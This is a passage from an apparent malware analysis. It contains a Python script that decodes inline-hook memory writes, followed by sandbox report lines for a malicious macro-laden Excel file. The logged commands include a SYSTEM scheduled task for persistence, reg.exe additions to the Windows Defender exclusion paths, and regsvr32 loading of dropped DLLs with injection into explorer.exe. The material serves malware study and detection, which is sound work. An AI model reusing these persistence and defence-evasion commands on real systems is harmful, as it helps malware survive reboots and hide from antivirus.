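SAMPLE_WRITES = r"""
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2008 base: AE102D value: E9 BA 4C 5A FF Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2608 base: AE102D value: E9 BA 4C 5A FF Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2540 base: AE102D value: E9 BA 4C 5A FF Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 408 base: AE102D value: E9 BA 4C 5A FF Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2008 base: B0000 value: 9C Jump to behavior
""".strip().splitlines()

WRITE_RE = re.compile(r"Memory written: PID: (\d+) base: ([0-9A-Fa-f]+) value: ((?:[0-9A-Fa-f]{2}\s?)+)")

# Bounds of the explorer.exe code functions the report lists (assumed to be the injected region).
INJECTED_LO, INJECTED_HI = 0x00085A61, 0x00094FC0


def jmp_rel32_target(address, patch):
    """Resolve the destination of a 5-byte E9 (JMP rel32) written at `address`."""
    if len(patch) != 5 or patch[0] != 0xE9:
        raise ValueError("not a 5-byte JMP rel32")
    rel = int.from_bytes(patch[1:5], "little", signed=True)   # displacement is signed
    return (address + 5 + rel) & 0xFFFFFFFF                  # relative to the next instruction, 32-bit space


def classify_patch(patch):
    if len(patch) == 5 and patch[0] == 0xE9:
        return "jmp rel32"
    if patch == b"\x9C":
        return "pushfd"
    return "other"


def decode_writes(lines):
    """Return (pid, address, kind, jump target or None, target inside injected range) per write."""
    rows = []
    for line in lines:
        m = WRITE_RE.search(line)
        if not m:
            continue
        pid, addr = int(m.group(1)), int(m.group(2), 16)
        patch = bytes.fromhex(re.sub(r"\s", "", m.group(3)))
        kind = classify_patch(patch)
        target = jmp_rel32_target(addr, patch) if kind == "jmp rel32" else None
        inside = target is not None and INJECTED_LO <= target <= INJECTED_HI
        rows.append((pid, addr, kind, target, inside))
    return rows


if __name__ == "__main__":
    for pid, addr, kind, target, inside in decode_writes(SAMPLE_WRITES):
        dest = "-> 0x%08X (%s)" % (target, "injected region" if inside else "elsewhere") if target else ""
        print("PID %-5d write at 0x%08X: %-9s %s" % (pid, addr, kind, dest))
```

For the hooked function to keep working, the five displaced bytes at 0xAE102D have to be preserved in a trampoline somewhere in the injected region; the report shows only the overwrite, not that trampoline, so it is not reconstructed here.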
Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: Compensation-1730406737-09272021.xls, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Djryxcyvgoe' /d '0'
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Benqxuam' /d '0'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: explorer.exe, 00000005.00000002.705503167.0000000000D90000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000002.705503167.0000000000D90000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000005.00000002.705503167.0000000000D90000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_000831C2 CreateNamedPipeA, 5_2_000831C2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 4_2_1000980C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW, 4_2_1000D01F